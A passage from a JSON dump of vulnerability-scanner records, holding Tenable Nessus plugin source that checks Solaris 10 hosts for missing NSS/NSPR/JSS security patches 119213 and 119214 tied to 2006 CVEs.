"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-04-01T06:23:07", "description": "NSS_NSPR_JSS 3.35_x86: NSPR 4.18 / NSS 3.35 / JSS 4.3.2.\nDate this patch was last updated by Sun : May/16/18", "edition": 25, "published": "2018-05-17T00:00:00", "title": "Solaris 10 (x86) : 119214-38", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-38.NASL", "href": "https://www.tenable.com/plugins/nessus/109884", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109884);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2020/01/08\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-38\");\n script_summary(english:\"Check for patch 119214-38\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119214-38\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.35_x86: NSPR 4.18 / NSS 3.35 / JSS 4.3.2.\nDate this patch was last updated by Sun : May/16/18\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-38\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-38 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-38\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.17.4: NSPR 4.10.7 / NSS 3.17.4 / JSS 4.3.2.\nDate this patch was last updated by Sun : Dec/24/15", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-32", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-32.NASL", "href": "https://www.tenable.com/plugins/nessus/107311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107311);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-32\");\n script_summary(english:\"Check for patch 119213-32\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119213-32\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.17.4: NSPR 4.10.7 / NSS 3.17.4 / JSS 4.3.2.\nDate this patch was last updated by Sun : Dec/24/15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-32\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-32 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-32\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-02-21T01:08:49", "description": "NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17\n\nThis plugin has been deprecated and either replaced with individual 119214 patch-revision plugins, or deemed non-security related.", "edition": 9, "published": "2005-10-19T00:00:00", "title": "Solaris 10 (x86) : 119214-36 (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_119214.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20055", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20055);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/07/30 13:40:15\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-36 (deprecated)\");\n script_summary(english:\"Check for patch 119214-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17\n\nThis plugin has been deprecated and either replaced with individual\n119214 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-36\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 119214 instead.\");\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-17T14:00:36", "description": "NSS_NSPR_JSS 3.16_x86: NSPR 4.10.4 / NSS 3.\nDate this patch was last updated by Sun : Nov/15/14", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119214-30", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-30.NASL", "href": "https://www.tenable.com/plugins/nessus/107812", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107812);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (x86) : 119214-30\");\n script_summary(english:\"Check for patch 119214-30\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119214-30\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.16_x86: NSPR 4.10.4 / NSS 3.\nDate this patch was last updated by Sun : Nov/15/14\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119214-30\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119214-30 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119214\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.03.05\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.03.44\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119214-30\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.19.03\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:23", "description": "NSS_NSPR_JSS 3.17.2: NSPR 4.10.7 / NSS 3.1.\nDate this patch was last updated by Sun : Feb/19/15", "edition": 23, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119213-31", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119213", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119213-31.NASL", "href": "https://www.tenable.com/plugins/nessus/107310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107310);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-4339\", \"CVE-2006-4842\", \"CVE-2006-5201\", \"CVE-2006-7140\");\n\n script_name(english:\"Solaris 10 (sparc) : 119213-31\");\n script_summary(english:\"Check for patch 119213-31\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119213-31\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"NSS_NSPR_JSS 3.17.2: NSPR 4.10.7 / NSS 3.1.\nDate this patch was last updated by Sun : Feb/19/15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119213-31\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119213-31 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2006-7140\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris libnspr NSPR_LOG_FILE Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119213\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWjss\", version:\"4.0,REV=2004.11.05.02.31\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWpr\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWprd\", version:\"4.5.1,REV=2004.11.05.02.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWtls\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWtlsd\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119213-31\", obsoleted_by:\"\", package:\"SUNWtlsu\", version:\"3.9.5,REV=2005.01.14.17.27\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWjss / SUNWpr / SUNWprd / SUNWtls / SUNWtlsd / SUNWtlsu\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:00:36", "description": "NSS_NSPR_JSS 3.30.2_x86: NSPR 4.15 / NSS 3.30.2 / JSS 4.3.2.\nDate this patch was last updated by Sun : Nov/11/17", "edition": 25, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119214-36", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-4339", "CVE-2006-4842", "CVE-2006-5201", "CVE-2006-7140"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119214", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119214-36.NASL", "href": "https://www.tenable.com/plugins/nessus/107816", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107816);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", 